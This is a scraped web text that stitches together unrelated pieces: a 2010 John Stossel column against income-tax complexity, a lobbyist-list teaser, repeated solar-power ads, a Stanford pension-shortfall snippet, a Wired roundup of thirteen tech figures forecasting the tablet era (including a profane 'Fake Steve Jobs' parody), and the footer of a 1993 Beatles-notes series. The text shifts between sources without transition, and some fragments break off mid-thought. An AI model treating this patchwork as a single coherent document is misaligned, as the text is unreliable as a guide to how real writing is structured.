By John Stossel - April 14 , 2010
It 's that joyous time of year : income tax time .
So I spend time with my accountant .
I do n't want to see him , but I must .
I could not do what he 's doing .
The tax code has grown so complex that today most Americans hire someone to do their taxes .
For the money I pay my accountant , I could get a hundred massages .
I could buy a fancy motorcycle .
I could take a cruise ship to Venice and back .
Better yet , I could do some good in the world .
I could pay for two Habitat for Humanity homes or help three kids escape government schools by paying their tuition at a good Catholic school .
What a shame that I pay my accountant instead .
How'd we get to this point ?
U.S taxes were once simple !
The government funded itself on tariffs and excise taxes .
It did n't violate our privacy by asking us how much we made or how many dependents we have .
But in 1913 , the politicians decided they needed an income tax .
At first , they took little money : just 1 percent on incomes between $ 20,000 and $ 50,000 .
Those were big incomes -- adjusted for inflation , $ 50,000 is $ 1.1 million today .
The top bracket paid 6 percent , but that only applied to people who earned at least $ 11 million .
Anyone who made less than $ 400,000 paid no income tax .
But leave the amounts aside .
The increase in complexity is just as evil .
In 1913 , the first tax form and instructions totaled four simple pages .
Today 's 1040 , with instructions , totals 176 pages .
How did this happen ?
Because politicians win votes by giving gifts to favored groups .
Pandering legislators applaud themselves for offering tax credits to special interests .
The favored groups cheer their tax breaks , but the result is that everyone else pays more , and everyone must spend more time deciphering the rules .
And with every credit , the tax code gets more complicated .
The code is now 3,784,745 words long , not counting the 2009 and 2010 changes .
It will get worse in the future .
Americans spend more than 7 billion hours trying to comply , according to a forthcoming study from the National Taxpayer Union ( NTU ) .
" That is the equivalent of 3.7 million employees working 40 - hour weeks year - round without any vacation .
That 's more workers than are employed at the five biggest employers among Fortune 500 companies , " writes David Keating in the NTU study .
" Counting time and money for individual taxpayers , the compliance burden would total an incredible $ 103 billion for individual taxpayers alone . "
That does n't include the time spent doing state and local forms , or more important : the burden of " tax minimization strategies " on the economy .
And we have n't even mentioned the corporate income tax .
But do n't worry .
The IRS stands ready to assist the bewildered .
" If a taxpayer needs help beyond the basic form , " Keating writes , " the IRS now lists 1,909 publications , forms , and instructions for download ( some are duplicates in different languages ) from its
Web site -- up from the 1,770 NTU logged last year . "
Thanks a lot , IRS .
This is insane .
How dare a government that supposedly serves the people impose on us this way ?
Politicians who pass these tax laws are n't our representatives .
They 're our rulers !
They increase the tax burden and its complexity , and then demand we pay them homage to get exemptions for little pieces of our lives .
What are we to do ?
Some people say scrap the income tax for the Fair Tax , a national sales tax .
Others want a flat income tax of , maybe , 17 percent .
One form ; no deductions .
There 's always danger in proposing a replacement for the income tax :
We could end up with two taxes .
I would n't put it past our greedy Congress to promise that a national sales tax -- or worse , a value - added tax -- would replace the income tax then , once the new taxes are in place , to say that the need for revenue is so great that they must retain the income tax , too .
Let 's not take our eye off the ball : lower and much simpler taxes .
Mini-profiles on 20 of the lobbyists in the president ’s administration that he promised would n’t be there .
Fresh from his pledge that “ lobbyists wo n’t find a job ” in his White House , President Obama — on his first day in office — quickly signed an executive order “ banning former lobbyists from working on issues related to their lobby ” , Gus Lubin reports at Business Insider .
That said :
See the mini-profiles of 20 lobbyists here .
and the list of all 40 + here .
Find out more ...
Photovoltaic Contracting by SOLON .
What do business owners have to invest to get cheap solar power ?
One minute of their time .
Find out here how you could benefit from cheap solar power without having to invest in a photovoltaic system
Photovoltaic Contracting by SOLON .
What do business owners have to invest to get cheap solar power ?
One minute of their time .
Find out here how you could benefit from cheap solar power without having to invest in a photovoltaic system
Find out more ...
On-site Consumption Analysis for Industrial Companies .
For many industrial and commercial companies , on - site consumption offers an ideal opportunity to save on electricity costs .
But how much could your company potentially save with a photovoltaic system ?
Find out more ...
' ' I was taken down there by the man who discovered it .
As soon as we were finished they closed the door and locked it up again .
A study released Monday by Stanford University estimates that California 's three largest state - operated , public - employee pension funds — the California Public Employees ' Retirement System , California State Teachers ' Retirement System and University of California Retirement System — currently face a total shortfall of more than $ 500 billion .
The figure dwarfs the funds ' own combined shortfall estimate of $ 55 billion as of July 2008 , according to the report , which does n't account for the more than $ 100 billion loss sustained by ...
The New Generation of Tablet ComputersHow the Tablet Will Change the World13 of the Brightest Tech Minds Sound Off on the Rise of the Tablet • Neil Young • Steven Johnson
• Kevin Kelly
• James Fallows
• Bob Stein
• Martha Stewart
• Nicholas Negroponte
• Gina Bianchini
• George Lois
• Jack Dangermond
• Marshall McLuhan
• Fake Steve Jobs
• Chris Anderson
Neil Young
CEO and cofounder , ngmoco
Cool and Connected — — — — — — —-
Is the tablet a new mobile computing device ?
Well , yes , it is , by default .
But what is most interesting to me as a gamemaker is the impact that it can have in the least - mobile entertainment venue — the home .
Are n't home games played on consoles ?
Yes .
But for years , more and more players , especially teens , have been migrating to laptops and Flash gaming .
The Web has become not just a viable venue for games but also one of the most vibrant .
The iPhone 3GS is already far superior to the Nintendo DS or PSP and is approaching the performance level of the Wii .
A tablet that is powerful enough to handle great games and portable enough to take anywhere — with an immediate library of tens of thousands of inexpensive or free experiences from the App Store — will be serious competition for laptops .
Of course , the netbook was supposed to replace the laptop and be used by millions around the world .
Forget the netbook .
It 's a slow , clunky piece of junk .
Do I want to look like the guy who could n't afford a real computer or the guy who went to the future and brought back a device that 's as cool as I imagine I am ?
If the tablet is as appealing and useful as a laptop , with the power of a game console and an always - open library of apps , games , music , and entertainment , it will kill the laptop as a home games machine and kick the netbook out the window before it's had a chance to disappoint us with its inadequacy .
Steven Johnson
Science writer
The End of an Era — — — — — ——
Ten years from now , we will look back at the tablet and see it as an end point , not a beginning .
The tablet may turn out to be the final stage of an extraordinary era of textual innovation , powered by 30 years of exponential increases in computation , connection , and portability .
When the Homebrew Computer Club started holding meetings in the mid-'70s , the reigning assumption among critics and futurists was that we were headed , inexorably , toward an image - based culture dominated by the visual language of television .
The word — for so long the dominant medium for the transmission of information — was headed for the margins , subtitles underneath the hypnotic flicker of the Image Society .
But then something extraordinary happened .
The personal computer proved to be more than just a fancy calculator .
It turned out to be a device for doing things with words .
Each milestone in computation and connectivity unleashed a new wave of textual breakthroughs :
Early networks gave rise to email and Usenet ; the Mac UI made reading text on the screen tolerable ; the Internet platform ( and the NeXT development environment ) made it possible for one man to invent a universal hypertext system ; Google harnessed distributed computing to make the entire Web searchable in microseconds ; and thanks to Wi-Fi and cellular networks , along with hardware miniaturization , we can now download a novel to an ebook in 10 seconds .
It has been an exhilarating ride , but it is coming to an end , and that magical experience of instantly pulling Middlemarch out of the ether and onto your Kindle suggests why : Compared to other kinds of information that computers process today , text has an exceptionally small footprint .
With the arrival of the tablet , we have crossed a critical threshold :
Where text is concerned , we effectively have infinite computational resources , connectivity , and portability .
For decades , futurists have dreamed of the " universal book " : a handheld reading device that would give you instant access to every book in the Library of Congress .
In the tablet era , it 's no longer technology holding us back from realizing that vision ; it 's the copyright holders .
Advances in technology will give us plenty of headroom with other kinds of data : streaming real - time video , conjuring virtual spaces , exploring real - world environments with geocoded data , modeling complex systems like weather .
But in the tablet world , textual innovation will not come from faster chips or wireless networks .
Incremental improvements will continue , to be sure , but there will be a steady decrease in radical new ways we interact with text .
If you time - traveled back to the Homebrew Computer Club in 1975 , it would take you days to explain all the new possibilities for creating and sharing text .
( Imagine explaining Wikipedia to someone who has n't heard of the word processor . )
But I suspect that the text - based interactions that coalesce around the tablet will still seem familiar to my grandchildren in 2030 .
Unless , of course , we 've hit the singularity and the novels we 're downloading have been written by the machines .
But in that case , the rise of AI novelists will be the least of our worries .
Kevin Kelly
Technology pioneer
Window on the World — — — — — — —
–
Do n't think of them as tablets .
Think of them as windows that you carry .
Two things distinguish them from always - on smartphones and lightweight laptops .
First , these are mobile screens , meant to move .
They are aware of where they are in space and time .
Hold a window up in front of you and you see an alternative view of the scene .
Maybe you see annotated layers or a view from long ago .
If someone is speaking to you through the window , move the screen and it will sweep across the caller 's room .
This portable portal will peer into anything visible .
You 'll be able to see into movies , pictures , rooms , Web pages , places , and books seamlessly .
Many people think of this sheet as a full - color , hi-res , super ebook reader , but this viewer will be about moving images as much as text .
Not just watching video but making it .
It will have a built - in camera and idiot - proof video - editing tools , and it will also serve as a portble movie screen , eventually enabled for 3 - D .
You 'll " film " with the screen !
It will remake both book publishing and Hollywood , because it creates a transmedia that conflates books and video .
You get TV you read , books you watch , movies you touch .
And that is the second difference between this window and past devices :
The tablet window goes two ways .
You watch ; it watches you .
Its eye can remain on all the time , watching you as much as you like .
Brian
Eno once famously said ( in the pages of Wired ) that the problem with computers was that there was not enough Africa in them .
By this he meant that computers as we knew them could " see " only the wiggling ends of our fingers as we typed .
But if they could see and employ the rest of our body , as if we were dancing or singing , we could express ourselves with greater finesse .
This window tablet injects some Africa into computers .
It overthrows the tyranny of the keyboard .
Gestures are king .
Swoosh your fingers to scroll , wave your arms as with a Wii , shake or tilt it .
Celebrate its embodiment .
The craftsmanship of this device will matter .
We 'll spend hours holding it , caressing it , stroking its magic surface , watching it .
The feel of its surface , the liquidity of its flickers , the presence or lack of its warmth , the quality of its build , the temperature of its glow will come to mean a great deal to all of us .
James Fallows
National correspondent , The Atlantic
The Digital Copilot — — — — — ——
–
Will the tablet computer catch on ?
In one specialized realm , it already and decisively has : aerospace .
Right now , the flying world is far ahead of the general public in embracing tablet devices .
And while the motivations for widespread early adoption are specific to flying , they have enough parallels to normal terrestrial activity to suggest that tablets may find a place here on Earth .
The collective term for these devices is electronic flight bags .
EFBs come in many forms , including some built into cockpits .
But several popular versions resemble what Apple and others have announced : bigger than a PDA , smaller than a laptop , a flat working surface dominated by a display that accepts multiple kinds of touch inputs .
EFBs are expensive — costing many hundreds to many thousands of dollars — but also very popular , for several reasons .
First , they address a genuine point of pain .
Remember those squarish , footlocker - sized cases you used to see pilots wheeling through airports ?
They were jammed with the documents required for almost any flight — approach plates for landing in bad weather , charts , runway diagrams , checklists , and operating handbooks .
All that paper caused general chaos in the cockpit .
To have it all in one trim package brings relief .
EFBs also let pilots simultaneously work with different kinds of data .
The information a crew needs to see during flight consists of text ( checklists , notices ) , static diagrams ( airspace , airport layouts ) , and dynamic graphics ( wind patterns at different altitudes ) .
The EFBs present all this in one place — often as combined maps with text overlays , a view pilots can't get in any other way .
And they 're just as egalitarian about input .
Pilots do n't always have time to type , and depending on flight circumstances like turbulence or light , they might prefer touchscreens or knobs .
Good EFBs accept different kinds of entries .
More important , in the cockpit constant updates save lives .
Paper charts and briefings are out of date the second they 're printed .
Weather systems would have moved , airspace restrictions might have changed , and very often a plane 's route would be adjusted .
EFBs update constantly , usually via satellite networks .
All these traits could easily find applications in the nonflying world .
Engineers and architects might like to see a variety of data combined in one place as they stand outside a building site .
People in a teleconferenced meeting might sketch a design on a touchscreen tablet and have it appear on their colleagues ' devices around the world .
Journalists at a congressional hearing might have live - feed windows showing what is being said in other rooms .
And all of this information would be more useful on a device that 's bigger than an iPhone but that does n't require the awkward holding of an opened laptop .
There is one additional , crucial aspect of the EFB 's popularity : People mainly use it while sitting in a chair .
This points to the primary challenge for tablets : limiting them to situations when people can conveniently — and safely — stare at a screen .
The main social menace of mobile devices today is that people look at their screens when they should be looking at the road or sidewalk .
That 's not a problem on airplanes .
While pilots need to pay " strategic " attention to the flight —
" Where is that thunderstorm headed ? " — there 's less second - by - second risk if they 're checking their computer screen .
So we learn from jet pilots that tablets may indeed catch on — and they may well make all of our lives better .
As long as we keep them out of the driver 's seat , I 'm ready for the tablet age .
Bob Stein
Codirector ,
Institute for the Future of the Book
Follow the Gamers — — — — — ——
Twenty - five years ago , when I founded the Criterion Collection and Voyager , my imagination extended only as far as multimedia — enabling authors to express ideas with a palette that included audio , video , text , and graphics .
While CD - ROMs hinted at these possibilities , the advent of the Internet , particularly the Web , showed that locating works in a dynamic digital network promised even more fundamental changes .
The most important thing my colleagues and I learned from experiments with " networked books " is that as discourse moves from the page to the networked screen , the social aspects of reading and writing move to the fore .
A book is becoming a " place " where people congregate and converse .
The arrival of Apple , Android , and Nokia tablets ups the ante .
Simply moving printed texts to tablets ( as with the Kindle ) will be of limited value .
To succeed , publishers will have to embrace multimedia and community - building .
My guess is that the gaming industry will show us the way .
Unlike publishing , the culture of videogames is much less stifled by legacy products and thinking .
Multimedia is already its language , and gamemakers have vast experience building thriving communities .
As conventional publishers prayerfully port their print to tablets , my bet is that the gamemakers will invent the new forms of expression that will dominate the media landscape .
Martha Stewart
Magazine publisher and TV host
Into the Wild — — — — —
–
I 've been making magazines now for 20 years ; I 've been making books for 27 or 28 .
These are illustrated books and magazines that need a digital home somewhere .
My printed cookbooks — the ones that have no illustrations — are available for the Kindle on Amazon.com .
But the illustrated books need a full - blown effort like the iPad to really bring out the beauty of the images .
We all have so much to read these days , and having the ability to pick and choose and save and file and send digitally is really exciting .
I have a bag full of torn - out magazine pages that I distribute to various people for creative ideas .
I 'll be able to do that much more effectively if I have access to a digital version of those magazines rather than having to destroy them .
We are at a crossroads here .
The printing press is still in great use and is still a very viable tool .
But the Internet is also an exciting place to learn , to read , to see .
Either way , it 's about customers .
Where are those eyeballs ?
We have to find them .
That 's one of the big credos at our company .
Where our customer needs us and wants us , that 's where we want to be — with our products , with our magazines , with our books , with our television content .
Ultimately , the tablet will not take the place , I hope , of the printed page in terms of the magazine format .
I will continue to read print magazines , because I love them .
That 's me .
But I will also read digital magazines .
I will choose which ones .
There are some magazines that I would look at just to see in more depth .
National Geographic , God , I would love to see that .
I already have the digitized version of National Geographic , but it 's not the same thing .
It 's just like the magazine .
The tablet could be like going into Africa .
Photo : Dan Winters
Nicholas Negroponte
Founder , One Laptop per Child ;
first investor in Wired
The Next $ 100 Laptop — — — — — — ——
The unsung advantage of current ebooks is being able to use them in bed .
Paper books have pages that can neither disappear nor reappear .
Instead , we have to turn them , which is pretty stupid and not at all easy when you 're lying on your side .
So why tablets ?
A short answer : one - handedness .
And it 's not just for bed .
Would you have ever imagined how many people walk around looking at one hand ?
Texting is replacing talking , and thumbs are replacing lips .
Laptops , meanwhile , are not mobile .
They are nomadic .
You have to sit down to use one and do battle for a connection .
Standing with a laptop is entirely unsatisfactory .
Tablets are therefore the new frontier .
They are the new book , the new newspaper , the new magazine , the new TV screen , and potentially the new laptop .
Something you carry — and , yes , something you can lose .
The real beneficiaries , however , are not you and me or the thousands who will soon queue up to buy the iPad .
The undeniable beneficiaries of tablets will be those who have no alternative , those who have no books , no libraries , and in many cases no schools or electricity .
I mean the nearly 2 billion kids in the developing world .
For them , a tablet needs to be windup .
Yes , a crank , not solar but quiet human power that works at night , in cloud cover , and on windless days .
Such a device also needs to be unbreakable , water - resistant , and dust - proof , and to connect to the Internet for free .
At a minimum , it needs to hold 100 books and wirelessly access any of the titles stored on nearby tablets .
So , if you ship 100 of these to a remote African village , each loaded with 100 different books , that 's 10,000 books in the village — more than you and I had in primary school .
I 'm talking about the tablet version of the XO from One Laptop per Child , proposed for 2012 .
By that date , we will have moved from laptop to tablet for a variety of reasons , the biggest being cost .
The $ 100 laptop never actually hit $ 100 ( the closest we got was $ 175 ) , but we can get the price down , and the tablet is the way to do that .
It requires no moving parts , not even a hinge .
The housing can be made of a single piece of plastic .
The XO today has 900 pieces , most on its circuit board .
Ideally , the tablet 's circuit board will be reduced to only one chip .
XO laptops are now in the hands of 1.4 million children in 35 countries and support 25 languages .
The result :
The kids teach their parents to read and write , truancy drops , and educators say they have never loved teaching so much .
Most of the students own their XOs and feel that it 's the most important piece of hope in their life .
And not surprisingly , most of the kids even sleep with them .
Gina Bianchini
CEO , Ning
A smartphone is mobile , but it is n't fun to browse on .
On a laptop , the technology is built in , but few want to carry around a 6 - pound computer for the privilege of using a browser .
The tablet bridges this gap .
People will not only engage in new social experiences but will do so on a device that 's easy ( and beautiful ) to use , wherever they may feel so inspired .
George Lois
Advertising pioneer
The Real Thing — — — — ——
Way back when I was a young man , making deliveries at my father 's florist shop in the Bronx , I once had the unexpected choice of spending the evening taking a gander at some 1940s porno or accepting the invitation to have actual sex with a gorgeous lady I regularly delivered flowers to in ritzy Riverdale .
With a pounding heart , I chose the real thing .
That 's how I feel about experiencing a magazine 's contents on a crammed computer screen versus holding a magnificent magazine in my hands — with its surprising visual and visceral possibilities at the turn of each page .
The newfandangled tablets that let me read electronic magazines could be a useful research device at times , but the tactile and graphic excitement that 's available on the best graphically designed magazines are pitifully nonexistent on a bland , crowded computer screen .
And certainly , the possibility of a great magazine cover that knocks your eye out on the newsstand — one with a big , edgy idea that makes a statement about America 's politics and culture , that force - feeds an irresistible taste of a magazine 's content — is totally out of the question .
The magazine is dead .
Long live the magazine .
Jack Dangermond
President and founder , ESRI
Planning a garden , park , building , or city should n't be done in an office .
A location - aware tablet will let us use what 's called geodesign to compose participatory , what - if scenarios onsite , using maps that several people can share — something we could always do with paper but that 's been a challenge with digital maps in the field .
Marshall McLuhan
Prophet of the electronic age
The Medium Is Life — — — — — — —-
What would Marshall McLuhan ( 1911 - 1980 ) make of the coming tablet age ?
Contributing editor Gary Wolf channeled the oracular media theorist .
Steve Jobs is the preeminent figure of the late 20th century ; he is our Ford , our Disney .
Like them , Jobs is a great success in business .
Others may have similar thoughts , similar predictions — in fact , if he were truly original he would not be so popular — but the fearlessness and simplicity of his attack on the old type of humanistic consciousness makes him a hero .
Jobs operates in the infralogic of the digital age , where the separation between user and product is vanishing , along with the outdated conscious operations of prediction and control .
Humanism temporarily survived the era of electronic media only through the act of turning on a device .
The knob or switch is like the cover of a book : Open it ; close it .
But when a medium is coincident with life , the last refuge for humanism is gone .
The iPad is the beginning of this end .
The thin , single pane of glass that comprises the interface is just a window onto the world , an edgeless frame .
Essentially , there is no interface , any more than a person 's fingertips are an interface .
The long story of humanism — by which I mean the emergence of individual consciousness as a byproduct of our language and literature — comes to an end when we return , futuristically , to doing everything by hand .
We no longer hear the voices of the past , because we have our fingers in our ears .
Fake Steve Jobs
Not the CEO of Apple
Go Save Yourself — — — — — —
–
So once again we 've changed the world with a mind - blowing , revolutionary product that does things that everybody considered impossible .
An ebook reader that also plays movies and music ?
And browses the Web ?
No way .
Ca n't be done .
Well , we did it .
And you can fly three times around the globe and watch movies the whole time on a single battery charge .
It 's amazing .
Phenomenal .
Exciting .
Magical .
Amazing .
Beautiful .
Stunning .
Gorgeous .
And yet for some people in the media , this is not enough .
These people are disappointed because they expected the iPad to also save newspapers from a certain death .
Yes , David Carr of The New York Times , I 'm talking to you , you pie-eyed crackhead .
All I can say is , bitch , please !
I 'm a genius , but I 'm not a miracle worker .
Nor am I Mother Teresa .
I was n't put on earth to save The New York Times .
I was put on earth to restore a sense of childlike wonder to people 's empty , pathetic lives , and I must say that so far I 'm doing a pretty outstanding job .
Anyway , do you really think saving newspapers is just a matter of putting your old crap on a new device ?
Because from what I can see , The New York Times sucks just as bad on a Kindle as it does on paper .
That , in fact , is the real problem with The New York Times :
It sucks , and everyone knows it , except , apparently , the dumb fucks who write for The New York Times , which is , oddly enough , the heart of the problem .
Quod erat demonstrandum , as Socrates once said .
The iPad is n't about saving newspapers .
It 's about inventing new ways of telling stories , using a whole new language — one that we can't even imagine right now .
Like I said when I met the publisher of The New York Times when he begged me to let his new media guy get onstage at our iPad event :
Sully , I like you guys , but the truth is you guys really need to die so that we can clear the way for the new guys — although at the same time I do want to commend you for the great job you did when you landed that plane on the Hudson .
He 's like , What ?
And I 'm like , Was n't that you ?
And he 's like , No , that 's a guy named Sullenberger , and I 'm like , Well , what 's your name ?
and he says , Sulzberger , and I 'm like , OK , whatever , but you 're still screwed .
Hacks , I 'm sorry , but I 'm not going to save you .
Frankly , I do n't read magazines or newspapers , and if every last one of you were all erased from the planet tomorrow I would not notice and I would not care .
Having said that , I wish you all the best in whatever future careers you choose .
Gardening , I 've heard , is very peaceful and involves slinging manure , so you should be good at it .
Namaste .
Much love .
Peace .
Chris Anderson
Editor in chief , Wired
Ditch Your Laptop — — — — — ——
Tablets are the future of media — if they become ubiquitous .
And that will happen only if they replace laptops .
I think most of us are willing to carry two devices ( one is a phone ) but not three .
So why would they dump a keyboard for a touchscreen ?
Look to three data points for the answer : the iPhone , the Kindle , and the cloud .
The iPhone shows that loads of people want rich - media networked devices with them everywhere .
Like a tablet , the iPhone is a one - app - at - a - time full - screen experience , where the interface is determined as much by the apps and the device itself as it is by the OS .
By dint of its bigger screen , a tablet is immersive enough to spend hours with — and yet it 's still intimate .
A laptop is a work device , an arm 's - length , lean - forward experience .
A tablet , in contrast , is a personal device , something you cradle and lean back with .
The Kindle shows that people are willing to pay for specialized devices if they can give them the flexibility to have the content they want when they want it .
For magazines , with their long - form text and engaging , visually rich design , a tablet could be perfect .
Of course , it will still have a Web browser , but it 'll also have a critical mass of content — games , books , magazines , and video — that is n't Web - based .
All the impact ( and more ) of print , with the convenience of digital delivery .
If it worked for the single - purpose Kindle , it will work even better for the multipurpose tablet .
Imagine highly produced , curated content that arrives as an event to look forward to , like a film opening or a book launch .
This is where the new business models kick in : Tablets can show media in a context worth paying for .
The first issue of a magazine might even be free , like the first few levels of a game are , but that 's just a sampler .
Rather than tell people about great content , that tablet lets them experience it — and easily upgrade to get more .
Finally , the cloud shows that as more and more of our data and software lives in servers somewhere , the computers we carry with us can be less and less powerful — thinner , lighter , longer battery life .
Let Google buy the big iron ; you can buy sexy aluminum and glass that 's a delight to hold .
Sure , rich - media apps like games and magazine readers will run locally , but they 'll be no resource - hogging Photoshop .
Modern smartphones have shown us what efficient mobile operating systems and specialized apps can do with hardware that would n't fill a single drive bay on a desktop PC .
Think of all the trips where you 've asked yourself , " Is this when I leave the laptop behind and just use my phone ? "
The tablet answers that question .
Bigger than a phone , funner than a laptop , more cuddly than a Kindle .
I think they 're going to sell like hotcakes .
Below is a complete index of the series in # order :
Regards ,
Alan ( awp@world.std.com )
---
" Thank you for all the cards and letters ... "
120193#90
---
" If you had n't come back it would have been the epilogue or the news in Welsh . "
053192#58
---
Copyright ( c ) 1993 by Alan W. Pollack All Rights Reserved
This article may be reproduced , retransmitted , redistributed and otherwise propagated at will , provided that this notice remains intact and in place .
Conversion to HTML by Ed Chen , Mike Markowski , Bruce Dumes , and Maurizio Codogno
Click here to return .
